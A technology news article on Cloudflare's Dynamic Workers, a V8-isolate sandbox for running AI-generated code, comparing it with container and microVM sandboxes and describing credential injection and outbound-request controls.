Every AI agent that generates and executes code needs somewhere safe to run it. You can’t just eval() AI-generated code in your application — a single prompt injection can introduce vulnerabilities. You need a sandbox: An isolated environment where code runs with only the specific capabilities it’s meant to access.
Most teams reach for containers. Cloudflare argues that’s the wrong tool for this job.
On March 24, Cloudflare launched Dynamic Workers in open beta — a sandboxing system for AI-generated code that uses V8 isolates instead of Linux containers. The company claims it’s approximately 100x faster to start and 10x to 100x more memory efficient than container-based alternatives. For the growing class of AI agent workloads where code is generated on the fly, executed once, and discarded, that performance gap changes the economics of secure execution.
The Case Against Containers for Agent Code
Containers take hundreds of milliseconds to boot and consume hundreds of megabytes of memory. To avoid cold-start delays, developers keep containers warm — which costs money. To avoid the overhead of starting new containers for each task, they reuse existing ones across multiple operations, compromising security isolation.
For long-running, persistent workloads, containers work well. For the pattern that AI agents increasingly follow — generate a small piece of code, execute it, return a result, discard the environment — the container model is overbuilt. You’re paying for a full Linux environment when all you need is a JavaScript runtime that starts in milliseconds and disappears when it’s done.
Dynamic Workers use V8 isolates, the same JavaScript engine that powers Google Chrome and has underpinned the Cloudflare Workers platform for eight years. An isolate starts in a few milliseconds, uses a few megabytes of memory, and can run on the same machine — even the same thread — as the Worker that created it. No cross-region communication to find a warm sandbox. No limits on the number of concurrent sandboxes or creation rates. Create one for every request, execute, and discard.
Why JavaScript and TypeScript
There’s a catch: The agent needs to write JavaScript. Cloudflare is direct about this constraint and equally direct about why it doesn’t matter.
AI models are fluent in every major programming language. Their JavaScript training data is massive. And JavaScript, by its nature on the web, was designed to be sandboxed. It’s the correct language for this job — not because developers prefer it, but because the isolation model is built into the language runtime.
The more interesting argument is about TypeScript as the interface layer. When an AI agent needs to interact with external APIs, it needs to understand what’s available. MCP defines schemas for flat tool calls but not programming APIs. OpenAPI handles REST APIs but is verbose. TypeScript gives the agent a precise understanding of the available API in very few tokens.
Cloudflare’s approach: Pass TypeScript interfaces into the agent’s sandbox as method parameters or environment objects. The Workers Runtime bridges these interfaces across the security boundary using Cap’n Proto RPC, so the agent calls APIs as if they were local libraries. The AI writes code against typed interfaces rather than making individual tool calls — what Cloudflare calls “Code Mode.” The company says converting an MCP server into a TypeScript API can cut token usage by 81%.
Security and Credential Isolation
Dynamic Workers inherit the security infrastructure Cloudflare has built over eight years of running its isolate-based platform. V8 security patches deploy rapidly. A custom second-layer sandbox adds defense beyond V8’s built-in isolation. Hardware security features provide additional boundaries.
For agents that need to call external HTTP APIs, the Dynamic Worker Loader provides a globalOutbound option that intercepts all outbound requests. Developers can inspect, rewrite, or block requests before they leave the sandbox. This enables credential injection — adding authentication tokens to outbound requests without the agent ever seeing the raw credentials.
That pattern should be familiar. IronCurtain uses a similar approach in Docker Mode, where the container receives a fake API key and a proxy swaps it for the real one. Stripe’s Machine Payments Protocol uses Shared Payment Tokens that scope payment authority without exposing credentials. The principle is consistent: Give the agent a capability without giving it the secret.
Setting globalOutbound: null blocks all internet access entirely — the sandbox can only interact with the APIs explicitly passed through the environment.
Mitch Ashley, VP and practice lead for software lifecycle engineering at The Futurum Group, confirms, “Cloudflare’s Dynamic Workers positions V8 isolates as the correct execution primitive for AI-generated code, signaling that agent code execution is becoming distinct infrastructure where cold-start latency and memory overhead directly constrain agent throughput and economics. Cloudflare claims isolates start 100x faster and use significantly less memory than containers, numbers that real workloads will validate or qualify over time.”
Ashley continues, “Teams building agent pipelines that generate, execute, and discard code continuously cannot absorb container cold-start penalties at scale. Vendors competing for the agent infrastructure layer who default to containers for disposable code execution will hit throughput and cost ceilings their competitors won’t.”
The Bigger Picture
Sandboxing is emerging as a distinct product category within the AI infrastructure stack. Cloudflare, E2B, Modal, Daytona, Northflank, Docker, and Vercel have all shipped sandbox capabilities in the past year. The approaches span the full isolation spectrum — from Cloudflare’s lightweight isolates to E2B’s Firecracker microVMs to Northflank’s Kata Containers.
The tradeoffs are real. Isolates are fast and lightweight but limited to JavaScript and WebAssembly. Containers support any language and runtime, but are slower and heavier. MicroVMs provide stronger isolation with a dedicated kernel per workload, but incur more overhead. The right choice depends on the workload: short-lived agent code snippets favor isolates, persistent development environments favor containers or microVMs, and untrusted code from external sources may warrant the strongest isolation microVMs provide.
Cloudflare’s bet is that the majority of agent-generated code falls into the first category — small, short-lived, disposable. If AI agents increasingly operate by writing tiny programs against typed APIs rather than making sequential tool calls, then the runtime that can spin up in milliseconds, execute, and vanish has a structural advantage.
The company is positioning this as part of a broader strategy. Dynamic Workers complement Cloudflare’s existing Agents platform, Durable Objects for persistent state, and its work on MCP server hosting. The pitch: the full infrastructure for building, running, and sandboxing AI agents on one network, in hundreds of locations worldwide.
Dynamic Workers are now available in open beta for all paid Workers users via the Dynamic Worker Loader API.
